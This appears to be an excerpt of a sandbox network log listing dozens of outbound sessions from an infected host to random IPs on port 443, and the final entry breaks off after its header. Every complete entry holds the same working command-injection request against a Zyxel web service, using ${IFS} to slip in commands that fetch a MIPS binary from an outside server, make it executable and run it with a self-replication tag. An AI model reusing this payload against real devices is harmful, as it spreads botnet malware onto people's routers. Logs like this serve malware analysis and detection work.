                                      18192.168.2.145616838.219.149.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234802961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19192.168.2.146068827.175.8.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234858036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20192.168.2.145017878.206.157.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234951973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21192.168.2.145440683.202.226.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235012054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22192.168.2.1449078155.176.87.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235093117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23192.168.2.1449492217.126.53.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235148907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24192.168.2.1457742157.32.117.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235199928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25192.168.2.1459212125.229.55.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235270023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26192.168.2.1442054142.138.40.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235351086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      27192.168.2.143504436.14.167.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235394001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      28192.168.2.1434472124.68.105.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235512972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      29192.168.2.145260475.109.199.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235513926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      30192.168.2.144780865.131.137.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235567093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      31192.168.2.1439354196.71.194.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235625982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      32192.168.2.1453482147.16.150.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235733986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      33192.168.2.1444350158.92.140.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235771894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      34192.168.2.1455742203.238.202.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235837936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      35192.168.2.145525032.66.124.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235903025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      36192.168.2.144797498.205.155.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.235984087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      37192.168.2.144979413.111.201.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236067057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      38192.168.2.144995049.211.101.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236125946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      39192.168.2.1450966170.119.11.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236207008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      40192.168.2.144558453.231.98.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236263037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      41192.168.2.1447052140.208.104.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236351013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      42192.168.2.144178048.99.16.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236392021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      43192.168.2.1451368171.133.5.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236429930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      44192.168.2.1440446183.164.166.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236478090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      45192.168.2.146032482.46.91.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236560106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      46192.168.2.1451736147.117.113.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236628056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      47192.168.2.1457590164.148.113.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236675024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      48192.168.2.145297434.35.7.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236738920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      49192.168.2.1439114204.239.143.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236830950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      50192.168.2.1453370182.60.149.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236867905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      51192.168.2.14454649.96.93.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236975908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      52192.168.2.1434176143.223.226.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.236979008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      53192.168.2.1445024134.158.10.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237044096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      54192.168.2.1456374176.179.227.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237082958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      55192.168.2.1453686203.10.97.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237186909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      56192.168.2.1449034132.103.151.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237262011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      57192.168.2.1459028115.114.221.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237308979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      58192.168.2.1451662130.96.52.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237375975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      59192.168.2.14513941.49.229.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237442017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      60192.168.2.1450910116.228.96.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237546921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      61192.168.2.145958671.24.175.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237610102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      62192.168.2.1435142152.23.57.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237643957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      63192.168.2.145309044.154.204.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237797022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      64192.168.2.1460982191.82.232.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237855911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      65192.168.2.1441376190.83.143.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237909079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      66192.168.2.1455004134.148.177.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.237958908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      67192.168.2.1440748223.79.212.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238048077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      68192.168.2.144090627.213.90.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238099098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      69192.168.2.1437720114.22.252.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238147974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      70192.168.2.143977214.18.145.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238190889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      71192.168.2.1438968116.0.248.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238287926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      72192.168.2.1456446176.175.196.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238329887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      73192.168.2.1454606103.96.207.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238368034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      74192.168.2.146009813.160.100.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238440990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      75192.168.2.144863893.18.177.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238471031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      76192.168.2.1444002167.233.85.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238539934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      77192.168.2.145858840.39.168.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238579035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      78192.168.2.1448356168.21.69.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238655090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      79192.168.2.1451334190.123.248.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238713980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      80192.168.2.143741245.114.198.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238780975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      81192.168.2.144661683.93.75.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238847971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      82192.168.2.1451864211.56.141.103443
                                      TimestampBytes transferredDirectionData
